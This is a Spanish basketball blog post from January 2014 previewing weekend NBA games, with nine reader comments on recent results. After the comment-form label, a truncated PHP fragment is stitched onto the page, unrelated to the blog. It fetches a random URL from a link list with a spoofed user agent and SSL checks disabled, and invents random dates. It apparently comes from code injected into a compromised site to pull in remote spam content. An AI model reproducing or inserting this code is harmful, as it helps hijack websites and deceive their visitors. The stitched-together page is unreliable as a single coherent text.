Fin de semana

10 de January de 2014 por TheDeerHunter

Viernes noche y os quedáis con los mandos de la nave.

La sesión de esta noche puede ser más interesante de lo que cabría esperar, debido a un único choque entre equipos con balance positivo, el Rockets@Hawks (1:30 AM) Habrá que comprobar si los Heat repiten resbalón en Brooklyn (2 AM), como ya les ocurrió anoche en el Madison. Cuidado porque el equipo de Kidd parece haber cogido el tono y ya están en zona playoffs.
También hay curiosidad por ver cómo funcionan los Wolves, después de la llamada de atención de Love a sus compañeros tras la derrota ante Phoenix. Reciben a Bobcats, que este año suele ser un equipo rocoso (2AM)
También se puede ver el Wizards@Pacers, también tras derrota de los líderes y contra un rival que no suele poner las cosas fáciles (1 AM) y dos buenos duelos en el Oeste: Suns@Grizzlies (2AM) y Mavs@Pelicans (2AM) Para quien le quede ganas no está mal ver la vuelta a casa del equipo más en forma de la liga, Warriors, ante Celtics (4:30 AM) o el descafeinado derbi angelino a la misma hora.

El sábado comprobaremos si los equipos de Nueva York mantienen la remontada, en esta ocasión ambos como visitantes. Nets visitan Toronto (1 AM) y Knicks visitan Philadelphia media hora más tarde. Destacamos el back to back entre Pelicans y Mavs (2:30 AM) o la visita de Rockets a la capital (1 AM)

Finalmente, el domingo, 3 únicos platos: Cavs@Kings y Hawks@Grizzlies a medianoche y un excelente Wolves@Spurs para cerrar el fin de semana.

Que disfrutéis.

Comenta

9 comentarios a esta entrada

  1. nba dice:
    #1

    el partido de Lakers contra Clippers, deberia titularse “La escenificacion de una tragedia” o “Que hacer cuando te humillan”..
    Madre mia, a ver si largan a d’antoni

      Citar

  2. Denise dice:
    #2

    nba:
    el partido de Lakers contra Clippers, deberia titularse “La escenificacion de una tragedia” o “Que hacer cuando te humillan”..
    Madre mia, a ver si largan a d’antoni

    Hombre, a D’Antoni se le pueden criticar muchas cosas, pero la derrota de ayer no. Con la mierda equipo que tiene en estos momentos, ni el mejor entrenador que imagines puede hacer milagros. Ademas en el fondo, estas derrotas vienen bien a Lakers por aquello del Draft, eso sí, hasta que Kobe acabe su contrato dentro de 2 años no volverán a tener aspiraciones serias al anillo.

    Este Griffin, si es un valido segunda espada, el del año pasado no. Gran partido de Redick tras 2 meses sin jugar, y excepcional Collison en estos partidos supliendo a Paul.

    Del resto, vaya defensa de los Pacers dejando en 66 puntos a los Wizards, y los Nets empiezan a espabilar con 5 victorias consecutivas, aunque ésta contra Miami tiene condicionantes como que Wade y Chalmers ni jugaron. Pero tal y como está la conferencia, a poco que se mantengan en el 50% de victorias, acabaran 3º.

    Otro partido en el que los GSW tienen que tirar de la calidad individual, en este caso de Curry, para ganar un partido en el último segundo a un rival inferior como estos Celtics. Para mí, junto a Indiana, Miami y Clippers son los favoritos nº1 al anillo, pero mucho tienen que mejorar para hacer algo grande esta temporada. Eso si, en finales apretados en PO, con la experiencia que tienen ya, van a ser peligrosisimos.

      Citar

  3. Luis H. dice:
    #3

    La victoria de Nets tiene mucho mérito. Si bien los de Florida pueden argumentar que faltaban Wade y Chalmers, los de Brooklyn podrían decir que no están Deron Williams ni Brook López. Parecida anda la enfermería. Empiezan a carburar y van a ser duros de pelar

      Citar

  4. The wolf dice:
    #4

    Lo de los motes de las camisetas ayer en el Nets – Heat fue la primera vez o ya se ha hecho en algun otro partido??. Es de lo más feo y absurdo que he visto en mucho tiempo a todo esto.

      Citar

  5. Jose Luis dice:
    #5

      Citar

  6. Melo15 dice:
    #6

    Cousins ahora mismo es el mejor pivot de la NBA.
    Parece que este año ha sentado la cabeza y esta haciendo una gran temporada.
    TOP-10 en anotacion, rebotes y robos y en aistencias es de los mejores pivots.

      Citar

  7. Schize dice:
    #7

    Los knicks siguen con su particular resurrección, a ver cuanto les dura. Un dato que me llama la atención es que JR lanzó solamente 8 veces a canasta (y con buenos porcentajes, doblemente sorprendente) y repartió 6 asistencias. ¿Querría reconciliarse con afición, entrenador y compañeros o habrá sido algo puntual?

      Citar

  8. jhc dice:
    #8

    Estos Toronto van en serio, esta noche cortaron la buena racha de brooklin

      Citar

  9. The wolf dice:
    #9

    Vaya mate brutal de wiggins es.pn/1gucw1H

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>